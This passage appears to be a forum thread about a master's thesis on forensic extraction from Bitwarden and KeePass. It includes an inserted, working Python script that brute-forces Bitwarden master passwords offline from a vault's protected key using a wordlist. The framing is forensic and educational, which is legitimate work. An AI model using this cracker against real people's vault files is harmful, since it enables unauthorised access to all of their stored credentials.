The present work addresses this gap and presents a process to extract forensically relevant data from two password manager applications – Bitwarden and KeePass – by extending an existing forensic framework called Vision.
Using design science, a forensic extraction process was developed by thoroughly analysing the inner workings of the mentioned password managers. The artefact was named Password Manager Forensics (PMF) and consists of a four-step extraction process with different Python modules to automate the extraction of relevant data. PMF was tested against three scenarios in a laboratory setting to evaluate its applicability in an investigative context.
The results show that the artefact is able to extract forensically relevant information related to password managers that would otherwise not be readily available to investigators. PMF is capable of identifying and extracting relevant files, extracting master passwords from a memory dump, parsing configuration files for relevant data, brute-forcing master passwords and PIN codes, decrypting, extracting, and validating password manager vault data, and creating summary reports.
PMF is the first comprehensive forensic process to extract relevant data from password managers. This brings new opportunities for digital forensics examiners and a potential to improve the handling of devices that contain password manager data in digital investigations.
The current version of PMF only supports the Windows desktop applications of Bitwarden and KeePass.
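The abstract lists brute-forcing master passwords and validating vault data among PMF's steps. The script below is an added example for this thread, not code from the thesis or from Bitwarden: it shows how a Bitwarden master-password candidate can be validated offline against the protected user key from the desktop client's data.json without decrypting anything, by recomputing the MAC. It assumes a PBKDF2-SHA256 account and Bitwarden's documented key schedule (salt is the lowercase e-mail, the stretched key comes from HKDF-Expand-SHA256 with info "enc"/"mac", and the type-2 cipher string "2.<iv>|<ct>|<mac>" carries HMAC-SHA256(macKey, iv || ct)); the iteration count must be read from the profile, since older accounts use 100,000 and newer ones 600,000, and Argon2id accounts are not covered. The sample protected key is constructed inside the script with random-looking filler as the ciphertext.

```python
"""Offline validation of Bitwarden master-password candidates via the MAC.

Added example for this thread; not PMF's code and not Bitwarden's code.
Assumptions (Bitwarden's published client behaviour, not the thesis):
  master key   = PBKDF2-SHA256(password, lowercase(email), iterations, 32)
  enc/mac keys = HKDF-Expand-SHA256(master key, "enc"|"mac", 32)
  cipher string type 2: "2.<iv_b64>|<ct_b64>|<mac_b64>",
  mac = HMAC-SHA256(mac key, iv || ct)
"""
import base64
import hashlib
import hmac
from typing import Iterable, Optional


def master_key(password: str, email: str, iterations: int) -> bytes:
    """32-byte master key; the salt is the account e-mail, lowercased."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                               email.strip().lower().encode("utf-8"),
                               iterations, 32)


def hkdf_expand(prk: bytes, info: bytes, length: int = 32) -> bytes:
    """RFC 5869 expand step only; the master key is used directly as the PRK."""
    out, block, counter = b"", b"", 1
    while len(out) < length:
        block = hmac.new(prk, block + info + bytes([counter]), hashlib.sha256).digest()
        out += block
        counter += 1
    return out[:length]


def stretched_keys(mk: bytes) -> tuple:
    """(encryption key, MAC key) derived from the 32-byte master key."""
    return hkdf_expand(mk, b"enc"), hkdf_expand(mk, b"mac")


def parse_cipher_string(cs: str) -> tuple:
    """Split a type-2 cipher string into raw (iv, ciphertext, mac)."""
    enc_type, rest = cs.split(".", 1)
    if enc_type != "2":
        raise ValueError(f"unsupported encryption type {enc_type}")
    iv_b64, ct_b64, mac_b64 = rest.split("|")
    return tuple(base64.b64decode(x) for x in (iv_b64, ct_b64, mac_b64))


def check_candidate(password: str, email: str, iterations: int,
                    protected_key: str) -> bool:
    """True if the candidate's MAC key authenticates the protected key.

    No AES is needed: a wrong password yields a wrong MAC key, so the HMAC
    over iv||ct will not match. Constant-time compare avoids timing leaks."""
    iv, ct, mac = parse_cipher_string(protected_key)
    _enc_key, mac_key = stretched_keys(master_key(password, email, iterations))
    expected = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    return hmac.compare_digest(expected, mac)


def brute_force(protected_key: str, email: str, iterations: int,
                wordlist: Iterable[str]) -> Optional[str]:
    """Return the first wordlist entry that validates, or None."""
    for candidate in wordlist:
        if check_candidate(candidate, email, iterations, protected_key):
            return candidate
    return None


def constructed_sample(password: str = "correct horse battery staple",
                       email: str = "Alice@Example.org",
                       iterations: int = 600_000) -> tuple:
    """CONSTRUCTED test fixture, not a real vault export.

    The 64-byte 'ciphertext' is deterministic filler (AES is irrelevant to
    the MAC path), but the MAC is computed exactly as the client would."""
    iv = bytes(range(16))
    ct = hashlib.sha256(b"constructed filler").digest() * 2
    _enc_key, mac_key = stretched_keys(master_key(password, email, iterations))
    mac = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    cs = "2." + "|".join(base64.b64encode(x).decode() for x in (iv, ct, mac))
    return cs, email, iterations


if __name__ == "__main__":
    cs, email, iters = constructed_sample()
    words = ["password123", "letmein", "correct horse battery staple", "hunter2"]
    print("recovered master password:", brute_force(cs, email, iters, words))
```

Each candidate costs one full PBKDF2 run, so the iteration count in the profile is what bounds the attacker; the MAC check itself is negligible. The same structure extends to Argon2id accounts by swapping `master_key`, but that needs a non-standard-library dependency and is left out here.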
I don’t have deep technical knowledge to judge the source, but the first thing I see on the page is that it’s a master’s thesis. I have a master’s in a non-computer-science field, but generally it’s hard to find revealing things in a master’s thesis.
Looking at the scenarios, in all cases your device needs to be seized. Personally, there would be other things than Bitwarden to worry about if my device were taken from me.
The author did a good thesis here. This article is essentially just a reference on what information you’re likely to get from password managers from a physical extraction of a suspect’s PC. It’s nothing that people don’t already know, but it’s a good read nonetheless.
KeePass typically encrypts and erases memory, but as seen in the thesis that didn’t appear to work. It may be due to how he performed the memory extraction, as he used a VirtualBox VM physical memory dump rather than a Windows OS memory dump artefact; I would have liked to see him examine those types of dumps.
It should be worth noting that, judging by the literature review and the fact that the latest article he captured was from around March of this year, he likely worked on this investigation within that timeframe. That tool is likely not to work anymore due to some changes in how KeePass manages passwords in memory. KeePass now creates dummy material in memory of the same length as the original key.
In May, another researcher disclosed a security vulnerability relating to capturing the KeePass master password in memory.
I memory dumped my latest KeePass with the PMF script and my password was apparently ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/.
Likewise, mitigations like these are more to protect KeePass databases from malware than from forensics; if your PC is undergoing a forensic extraction, you’d probably have a hundred other things to worry about before your password database.
Strongly agree. Pretty much all master’s digital forensics papers are done in a consent-based extraction scenario where a compromise like brute-forcing was successful, since “we were unable to perform the extraction” wouldn’t make a good thesis to read.